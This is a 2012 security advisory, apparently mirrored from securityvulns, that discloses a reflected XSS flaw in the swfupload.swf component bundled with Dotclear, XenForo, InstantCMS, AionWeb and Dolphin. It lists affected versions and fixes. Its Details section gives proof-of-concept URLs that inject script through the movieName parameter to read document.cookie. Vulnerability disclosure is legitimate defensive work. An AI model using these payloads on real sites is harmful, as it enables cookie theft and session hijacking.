Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28760
HistoryNov 18, 2012 - 12:00 a.m.

XSS vulnerability in web applications with swfupload: Dotclear, XenForo, InstantCMS, AionWeb, Dolphin

2012-11-1800:00:00
vulners.com
33
JSON

Hello 3APA3A!

I will draw your attention to XSS vulnerability in other web applications with swfupload. Earlier I've wrote about swfupload in WordPress (CVE-2012-3414) and that this hole is available in many web applications.

In previous letter I've wrote the information about different versions of this swf-file (with different names) and all versions of WordPress, which contain any of these swf-files. And here is information about Dotclear, XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications which are bundled with swfupload.swf.

Affected products:

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, Dolphin. There is no information that they have fixed this vulnerability in their software (at that this vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this vulnerability was fixed and patch was released for previous versions (already at 19.06.2012).

The developers of WordPress released new version of flash file (the same did the developers of XenForo), which could be used by all web developers, which were using swfupload.

Details:

XSS (WASC-08):

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Swfupload is used in WordPress, plugins for WP and in other web applications. There are many web applications with it, not as many as those which are using JW Player (http://securityvulns.com/docs28176.html) and JW Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in them I've disclosed earlier), but still a lot of.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Related

threatpost 2
securityvulns 4
packetstorm 4
openvas 2
zdt 2
seebug 1
cve 4
debiancve 2
patchstack 1
prion 4
typo3 1
ubuntucve 2
nessus 1
threatpost
threatpost
Issue with SWFUploader Could Lead to XSS Vulnerabilities, Content Spoofing
2013-03-12 19:10:36
Yahoo Mail Breach Linked to Old WordPress Vulnerability
2013-02-01 03:42:54
securityvulns
securityvulns
CS and XSS vulnerabilities in SWFUpload
2013-03-11 00:00:00
XSS and CS vulnerabilities in Dotclear
2013-05-06 00:00:00
XSS vulnerability in swfupload in WordPress
2012-11-18 00:00:00
packetstorm
packetstorm
SWF Upload Cross Site Scripting
2012-11-13 00:00:00
WordPress 3.3.1 swfupload.swf Cross Site Scripting
2012-11-09 00:00:00
Dotclear 2.4.4 Cross Site Scripting / Content Spoofing
2013-04-13 00:00:00
openvas
openvas
FreeBSD Ports: typo3
2012-08-10 00:00:00
TYPO3 SWFUpload movieName Cross Site Scripting Vulnerability
2014-01-02 00:00:00
zdt
zdt
Dotclear XSS Vulnerabilities
2013-04-14 00:00:00
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities
2014-01-23 00:00:00
seebug
seebug
Turbomail้‚ฎไปถ็ณป็ปŸXSS-1
2014-12-24 00:00:00
cve
cve
CVE-2012-3414
2013-07-19 14:36:00
CVE-2012-2399
2012-04-21 23:55:00
CVE-2013-4146
2022-06-30 13:15:00
debiancve
debiancve
CVE-2012-3414
2013-07-19 14:36:00
CVE-2012-2399
2012-04-21 23:55:00
patchstack
patchstack
WordPress SWFUpload Plugin <= 2.2.0.1 - XSS #1
2012-06-14 00:00:00
prion
prion
Cross site scripting
2013-07-19 14:36:00
Design/Logic Flaw
2022-06-30 13:15:00
Cross site scripting
2012-04-21 23:55:00
typo3
typo3
Cross-Site Scripting Vulnerability in TYPO3 Core
2012-07-04 00:00:00
ubuntucve
ubuntucve
CVE-2012-3414
2013-07-19 00:00:00
CVE-2012-2399
2012-04-21 00:00:00
nessus
nessus
WordPress < 3.3.2 Multiple Vulnerabilities
2012-05-09 00:00:00
JSON
Related for SECURITYVULNS:DOC:28760
threatpost2securityvulns4packetstorm4openvas2zdt2seebug1cve4debiancve2patchstack1prion4typo31ubuntucve2nessus1